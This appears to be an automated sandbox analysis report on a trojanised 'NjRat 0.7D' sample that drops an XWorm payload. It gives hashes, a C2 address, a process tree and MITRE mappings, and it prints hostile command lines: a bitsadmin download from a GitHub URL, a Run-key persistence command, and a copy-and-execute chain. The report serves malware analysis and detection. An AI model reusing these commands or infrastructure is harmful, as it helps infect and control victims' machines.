Analysis

max time kernel: 150s
max time network: 150s
platform: windows10-2004_x64
resource: win10v2004-20240802-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
submitted: 09-08-2024 10:24

Behavioral task: behavioral1
Sample: NjRat.0.7D-main/NjRat.0.7D/NjRat 0.7D.exe
Resource: win7-20240708-en
General

Target: NjRat.0.7D-main/NjRat.0.7D/NjRat 0.7D.exe
Size: 8.9MB
MD5: 3e8dc9ba82863bd3c1e5ec769d2c187f
SHA1: fa80a09b2a6804868c26dbeb62b073d1546a132b
SHA256: 6f4fb430fc36355253eff73a164d147ad1fa17dc9c62dba0984d003e1db74880
SHA512: 10e375f93a01925833c3199889afe889f8f83422a4aee8b21cddda65f5436184693d7156b9ae46be1fc25ef886d07af5fe9db15c297b7e58d8faea965151234c
SSDEEP: 196608:pG2cZZTlJT3BGzYRR/x8i1hDs79+wPUy07BtOxmgVfMpobGHCWhyn:82cXTlJT37RRKi1169+xy0DOxHVf7bGm

Malware Config

Extracted family: xworm
C2 (host:port): 83.143.112.30:3096
Dza3YLL2q2qcgzdH
Signatures

Detect Xworm Payload (1 IoC)
  yara_rule family_xworm matched resource behavioral2/memory/3716-51-0x0000000000400000-0x0000000000414000-memory.dmp (memory of PID 3716, InstallUtil.exe)

Download via BitsAdmin (1 TTP, 1 IoC)

Checks computer location settings (2 TTPs, 4 IoCs)
Looks up the country code configured in the registry, likely for geofencing.
  Key value queried: \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation
    by NjRat 0.7D.exe
    by WScript.exe
    by Isolation graphique de périphérique audio Windows .exe
    by WatchDog.exe
Executes dropped EXE (5 IoCs)
  PID 2948  NjRat 0.7D.exe
  PID 1960  audiodg.exe
  PID 4004  Isolation graphique de périphérique audio Windows .exe
  PID 4468  WatchDog.exe
  PID 4544  WatchDog.exe

Adds Run key to start application (2 TTPs, 1 IoC)
  reg.exe: Set value (str) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\audiodg = "C:\\Windows\\Isolation graphique de périphérique audio Windows .exe"
  The value name and the dropped file name mimic the legitimate audiodg.exe (Windows Audio Device Graph Isolation). Note the space before ".exe" in the target path; it is part of the file name and must be preserved when hunting for or quoting the file.

Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)

Suspicious use of SetThreadContext (1 IoC)
  PID 4004 (Isolation graphique de périphérique audio Windows .exe) set the thread context of PID 3716 (InstallUtil.exe). Together with the repeated WriteProcessMemory calls from 4004 into 3716 and the XWorm YARA hit on 3716's memory at 0x400000, this is consistent with the XWorm payload being injected into a hollowed InstallUtil.exe.

Drops file in Windows directory (2 IoCs)
  cmd.exe: File created C:\Windows\Isolation graphique de périphérique audio Windows .exe
  cmd.exe: File opened for modification C:\Windows\Isolation graphique de périphérique audio Windows .exe
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery (1 TTP, 12 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
    by NjRat 0.7D.exe, cmd.exe (x2), reg.exe, InstallUtil.exe, WatchDog.exe (x2), Isolation graphique de périphérique audio Windows .exe, audiodg.exe, PING.EXE (x3)

System Network Configuration Discovery: Internet Connection Discovery (1 TTP, 5 IoCs)
Adversaries may check for Internet connectivity on compromised systems.
  PID 4848  PING.EXE
  PID 3624  PING.EXE
  PID 4180  cmd.exe
  PID 3604  PING.EXE
  PID 1436  cmd.exe
  Every ping in this run targets 127.0.0.1 with -n 9 or -n 20 and is chained with && to the next command: the loopback ping is used as a delay between stages, not as a real connectivity check.

Modifies registry class (1 IoC)
  NjRat 0.7D.exe: Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings

Runs ping.exe (1 TTP, 3 IoCs)
  PID 3624  PING.EXE
  PID 3604  PING.EXE
  PID 4848  PING.EXE

Suspicious behavior: AddClipboardFormatListener (1 IoC)
  PID 3716  InstallUtil.exe
Suspicious behavior: EnumeratesProcesses (34 IoCs)
  PID 1960  audiodg.exe (24 events)
  PID 4004  Isolation graphique de périphérique audio Windows .exe (6 events)
  PID 4468  WatchDog.exe (1 event)
  PID 4544  WatchDog.exe (3 events)

Suspicious use of AdjustPrivilegeToken (5 IoCs)
  Token: SeDebugPrivilege  PID 1960  audiodg.exe
  Token: SeDebugPrivilege  PID 4004  Isolation graphique de périphérique audio Windows .exe
  Token: SeDebugPrivilege  PID 3716  InstallUtil.exe
  Token: SeDebugPrivilege  PID 4468  WatchDog.exe
  Token: SeDebugPrivilege  PID 4544  WatchDog.exe

Suspicious use of FindShellTrayWindow (1 IoC)
  PID 2948  NjRat 0.7D.exe

Suspicious use of SendNotifyMessage (1 IoC)
  PID 2948  NjRat 0.7D.exe

Suspicious use of WriteProcessMemory (45 IoCs)
  Source PID -> target PID, source process -> target process (number of writes):
  2772 -> 2948  NjRat 0.7D.exe -> NjRat 0.7D.exe (3)
  2772 -> 3880  NjRat 0.7D.exe -> WScript.exe (2)
  2772 -> 1960  NjRat 0.7D.exe -> audiodg.exe (3)
  3880 -> 2932  WScript.exe -> bitsadmin.exe (2)
  1960 -> 4180  audiodg.exe -> cmd.exe (3)
  4180 -> 3604  cmd.exe -> PING.EXE (3)
  1960 -> 1436  audiodg.exe -> cmd.exe (3)
  1436 -> 4848  cmd.exe -> PING.EXE (3)
  4180 -> 4792  cmd.exe -> reg.exe (3)
  1436 -> 3624  cmd.exe -> PING.EXE (3)
  1436 -> 4004  cmd.exe -> Isolation graphique de périphérique audio Windows .exe (3)
  4004 -> 3716  Isolation graphique de périphérique audio Windows .exe -> InstallUtil.exe (8)
  4004 -> 4468  Isolation graphique de périphérique audio Windows .exe -> WatchDog.exe (3)
  4468 -> 4544  WatchDog.exe -> WatchDog.exe (3)
  Two or three writes into a freshly created child are the normal process-creation pattern; the eight writes from 4004 into InstallUtil.exe (3716) are the outlier and match the SetThreadContext call and the in-memory XWorm detection on that PID.
Processes

Each entry gives the depth in the tree, the image path and PID, then the command line, then the signatures that fired for that process.

1  C:\Users\Admin\AppData\Local\Temp\NjRat.0.7D-main\NjRat.0.7D\NjRat 0.7D.exe  (PID 2772)
   "C:\Users\Admin\AppData\Local\Temp\NjRat.0.7D-main\NjRat.0.7D\NjRat 0.7D.exe"
   - Checks computer location settings
   - Modifies registry class
   - Suspicious use of WriteProcessMemory

   2  C:\Users\Admin\AppData\Local\Temp\NjRat 0.7D.exe  (PID 2948)
      "C:\Users\Admin\AppData\Local\Temp\NjRat 0.7D.exe"
      - Executes dropped EXE
      - System Location Discovery: System Language Discovery
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SendNotifyMessage

   2  C:\Windows\System32\WScript.exe  (PID 3880)
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\install.vbs"
      - Checks computer location settings
      - Suspicious use of WriteProcessMemory

      3  C:\Windows\System32\bitsadmin.exe  (PID 2932)
         "C:\Windows\System32\bitsadmin.exe" /transfer myDownloadJob /download /priority normal https://raw.githubusercontent.com/BlackAll9/rrr/main/MicrosoftEdge.rar C:\Users\Admin\AppData\Roaming\MicrosoftEdge.rar
         - Download via BitsAdmin

   2  C:\Users\Admin\AppData\Roaming\audiodg.exe  (PID 1960)
      "C:\Users\Admin\AppData\Roaming\audiodg.exe"
      - Executes dropped EXE
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      3  C:\Windows\SysWOW64\cmd.exe  (PID 4180)
         "cmd" /c ping 127.0.0.1 -n 9 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "audiodg" /t REG_SZ /d "C:\Windows\Isolation graphique de périphérique audio Windows .exe"
         - System Location Discovery: System Language Discovery
         - System Network Configuration Discovery: Internet Connection Discovery
         - Suspicious use of WriteProcessMemory

         4  C:\Windows\SysWOW64\PING.EXE  (PID 3604)
            ping 127.0.0.1 -n 9
            - System Location Discovery: System Language Discovery
            - System Network Configuration Discovery: Internet Connection Discovery
            - Runs ping.exe

         4  C:\Windows\SysWOW64\reg.exe  (PID 4792)
            REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "audiodg" /t REG_SZ /d "C:\Windows\Isolation graphique de périphérique audio Windows .exe"
            - Adds Run key to start application
            - System Location Discovery: System Language Discovery

      3  C:\Windows\SysWOW64\cmd.exe  (PID 1436)
         "cmd" /c ping 127.0.0.1 -n 20 > nul && copy "C:\Users\Admin\AppData\Roaming\audiodg.exe" "C:\Windows\Isolation graphique de périphérique audio Windows .exe" && ping 127.0.0.1 -n 20 > nul && "C:\Windows\Isolation graphique de périphérique audio Windows .exe"
         - Drops file in Windows directory
         - System Location Discovery: System Language Discovery
         - System Network Configuration Discovery: Internet Connection Discovery
         - Suspicious use of WriteProcessMemory

         4  C:\Windows\SysWOW64\PING.EXE  (PID 4848)
            ping 127.0.0.1 -n 20
            - System Location Discovery: System Language Discovery
            - System Network Configuration Discovery: Internet Connection Discovery
            - Runs ping.exe

         4  C:\Windows\SysWOW64\PING.EXE  (PID 3624)
            ping 127.0.0.1 -n 20
            - System Location Discovery: System Language Discovery
            - System Network Configuration Discovery: Internet Connection Discovery
            - Runs ping.exe

         4  C:\Windows\Isolation graphique de périphérique audio Windows .exe  (PID 4004)
            "C:\Windows\Isolation graphique de périphérique audio Windows .exe"
            - Checks computer location settings
            - Executes dropped EXE
            - Suspicious use of SetThreadContext
            - System Location Discovery: System Language Discovery
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory

            5  C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  (PID 3716)
               "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
               - System Location Discovery: System Language Discovery
               - Suspicious behavior: AddClipboardFormatListener
               - Suspicious use of AdjustPrivilegeToken

            5  C:\Users\Admin\AppData\Local\Temp\WatchDog.exe  (PID 4468)
               "C:\Users\Admin\AppData\Local\Temp\WatchDog.exe"
               - Checks computer location settings
               - Executes dropped EXE
               - System Location Discovery: System Language Discovery
               - Suspicious behavior: EnumeratesProcesses
               - Suspicious use of AdjustPrivilegeToken
               - Suspicious use of WriteProcessMemory

               6  C:\Users\Admin\AppData\Local\Temp\WatchDog.exe  (PID 4544)
                  "C:\Users\Admin\AppData\Local\Temp\WatchDog.exe"
                  - Executes dropped EXE
                  - System Location Discovery: System Language Discovery
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK Enterprise v15

Persistence
  BITS Jobs (1)
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
Privilege Escalation
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
Downloads

Filesize: 1KB
MD5: 7dca233df92b3884663fa5a40db8d49c
SHA1: 208b8f27b708c4e06ac37f974471cc7b29c29b60
SHA256: 90c83311e35da0b5f8aa65aa2109745feb68ee9540e863f4ed909872e9c6a84c
SHA512: d134b96fd33c79c85407608f76afc5a9f937bff453b1c90727a3ed992006c7d4c8329be6a2b5ba6b11da1a32f7cd60e9bc380be388b586d6cd5c2e6b1f57bd07

Filesize: 8.5MB
MD5: 70ea9c044c9a766330d3fe77418244a5
SHA1: 18602d0db52917b88cbdab84ba89181e6fd4686a
SHA256: b78fb092e151db613cba51d7f2532547e48c6f4712809a485f272e2ab55776a5
SHA512: 5261865e7ca21e928b956a97518366c9dc218a2312961e0ba0b72b37ae7c797176382de3c3dc1d2949aca51c3db330562f1087a71efdc7c3c3b8f8928872f917

Filesize: 76KB
MD5: 0e362e7005823d0bec3719b902ed6d62
SHA1: 590d860b909804349e0cdc2f1662b37bd62f7463
SHA256: 2d0dc6216f613ac7551a7e70a798c22aee8eb9819428b1357e2b8c73bef905ad
SHA512: 518991b68496b3f8545e418cf9b345e0791e09cc20d177b8aa47e0aba447aa55383c64f5bdaca39f2b061a5d08c16f2ad484af8a9f238ca23ab081618fba3ad3

Filesize: 78B
MD5: 771228b914581d4c92cb184ecf761d22
SHA1: 858b7e3e6ff6191dc7fd561510d24c3fb424ed8f
SHA256: ba4755fd48143ad928ffb6cc38ef749b1f11ddb204a04856d32ea53c967d448c
SHA512: 41537a8d5cbe04a53cf9c5f8eea68cc045b5c05336bcce162c88c00a66021511afbb5d1083b7883bc0e30e22f6d35d7421df486d25a102621f972bb1b5b3b1bf

Filesize: 81B
MD5: 0017979068fbfbd0fe002d93eed5fcd0
SHA1: e8cdad526e0698a58a1ef1818785bd1915137615
SHA256: 669c02322dda6a727344f84900f27e07aab26f54c16319aefac42d8b602f4a2c
SHA512: dd819ffaf1e09af7f54ce515fd936e775ecdf6a82cbe53dac72f0ca1da024b8dd3fc8f3e94c8c48f2a4d5a9e942afd73ebb1d114c016363e1023b3b947bd6a11

Filesize: 355KB
MD5: d9dfa8ba182529445890b5021e159b77
SHA1: 64f8724f8cd76adff12364e6bb2fc9eaceadb1ba
SHA256: 60df809a613aab714e2edad3338500a081fbae866cee3a4a3113abed60f5d59f
SHA512: d18f5d13d5ea4226e309fe7d5b59eac5770f391b92c5a03e0f14cd5e23a45b75ed2353e7a388198162061686d9c4675e11428d0362a01b7e05a0b4638fb10803

Filesize: 19KB
MD5: 4724c9dce57bc0472ed610ba16d08894
SHA1: d5fea3520146ccbf54c31b3b4868de499022fb37
SHA256: aaf7bddca268a157d995df03454ba4d15df36c6b717ebc7fb018e3c5101ef2fb
SHA512: d1ec126257698cecfcebf3db17c910b33a231d08d955a4659ed417e1c115976506e1bd55db463c0e1414e39e6f90f11b20ab2110048bd947e51d9473db292b18